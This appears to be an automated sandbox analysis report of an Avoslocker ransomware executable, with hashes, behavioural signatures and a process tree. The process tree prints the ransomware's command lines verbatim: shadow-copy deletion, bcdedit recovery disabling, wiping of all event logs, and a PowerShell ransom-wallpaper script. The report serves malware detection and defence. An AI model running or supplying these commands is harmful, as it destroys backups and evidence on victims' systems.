Analysis

- max time kernel: 117s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 30-05-2024 13:33

Static task: static1

Behavioral task: behavioral1
Sample: 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe
Resource: win7-20240221-en

Behavioral task: behavioral2
Sample: 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe
Resource: win10v2004-20240508-en
General

- Target: 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe
- Size: 1002KB
- MD5: 7152fd25b0f11276a5bc19f2ccce5e75
- SHA1: cba080861ab44809569f743a5aef581c0867938e
- SHA256: 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b
- SHA512: 503f0343838c062896ac5d27abfa681ac3e54db05dce691b23327d2f249430a992bb5eba85692fe41b3c09ce65df3ed089d3bd281f41a541bc798a8f10ca7016
- SSDEEP: 24576:G0XiZc8dyQNFphp8YPeM8LNKW3jGY+zSvxJcYq:7+NTXGM8LNF3jDQSoYq
Malware Config
Signatures
- Avoslocker Ransomware
  Avoslocker is a relatively new ransomware that was observed in late June and early July, 2021.
- Deletes shadow copies (3 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
  Processes:
    pid   Process
    1900  bcdedit.exe
    2292  bcdedit.exe
- Renames multiple (10371) files with added filename extension
  This suggests ransomware activity of encrypting all the files on the system.
- Drops desktop.ini file(s) (1 IoCs)
  Processes (description | ioc | Process):
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe
- Enumerates connected drives (3 TTPs, 1 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes (description | ioc | Process):
    File opened (read-only) | \??\Z: | 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes (description | ioc | Process):
    Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1172194971.png" | reg.exe
- Drops file in Program Files directory (64 IoCs)
  Processes: 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe
- Command and Scripting Interpreter: PowerShell
  Processes:
    pid   Process
    2364  powershell.exe
    1296  powershell.exe
- Interacts with shadow copies (2 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes:
    pid   Process
    2352  vssadmin.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes:
    pid   Process
    1252  05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe
    2364  powershell.exe
    1296  powershell.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe, WMIC.exe, powershell.exe, vssvc.exe
- Suspicious use of WriteProcessMemory (45 IoCs)
  Processes: 05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, powershell.exe
- Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

- C:\Users\Admin\AppData\Local\Temp\05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\05a53b88ceab3708ce07d5c879978265a090975c5ff063b7bea3b045c99b134b.exe"
  PID: 1252
  Signatures: Drops desktop.ini file(s); Enumerates connected drives; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c wmic shadowcopy delete /nointeractive
    PID: 1724
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\Wbem\WMIC.exe
      Command line: wmic shadowcopy delete /nointeractive
      PID: 2312
      Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c vssadmin.exe Delete Shadows /All /Quiet
    PID: 1100
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\vssadmin.exe
      Command line: vssadmin.exe Delete Shadows /All /Quiet
      PID: 2352
      Signatures: Interacts with shadow copies
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c bcdedit /set {default} recoveryenabled No
    PID: 1068
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\bcdedit.exe
      Command line: bcdedit /set {default} recoveryenabled No
      PID: 2292
      Signatures: Modifies boot configuration data using bcdedit
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
    PID: 2460
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\bcdedit.exe
      Command line: bcdedit /set {default} bootstatuspolicy ignoreallfailures
      PID: 1900
      Signatures: Modifies boot configuration data using bcdedit
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
    PID: 2564
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
      PID: 2364
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "$a = [System.IO.File]::ReadAllText(\"F:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
    PID: 1296
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1172194971.png /f
      PID: 224
      Signatures: Sets desktop wallpaper using registry
    - C:\Windows\system32\rundll32.exe
      Command line: "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
      PID: 3536
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 2236
  Signatures: Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 3291f54f33ef903dc784d3a5a0662a39
  SHA1: 2713596bb41a53cbaf004493f870e8728790419b
  SHA256: e7717c0d1ec1f106533f367496f548d6a9240f98e80808c545357237c1cbf1fa
  SHA512: af89c0db49ab333764d112550e494216681e25537eaddf5e07176c1ab4d0f8f353597794167fa8410ee78df42e896ea1ee90514b064b59bc2e117a17c763353e
- Filesize: 1011B
  MD5: 01188d22b1675e3437b1418e14f4ffab
  SHA1: 6e7127f3bbfce49485ed8f1acf8f697bcb952818
  SHA256: e4b3ac00a0b2eb195b26abffbc4368077384e73393e51605edda17dae05ab7f2
  SHA512: 6903ae3247f32ad79c60a2062cd6a7bdbf5a7c9db1bdc43bdbef4da3396945014d30968ea4c8531a2d0c7b695f1ea36e2b8c51bb39cc6157c4096ac04a6e187d
- MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e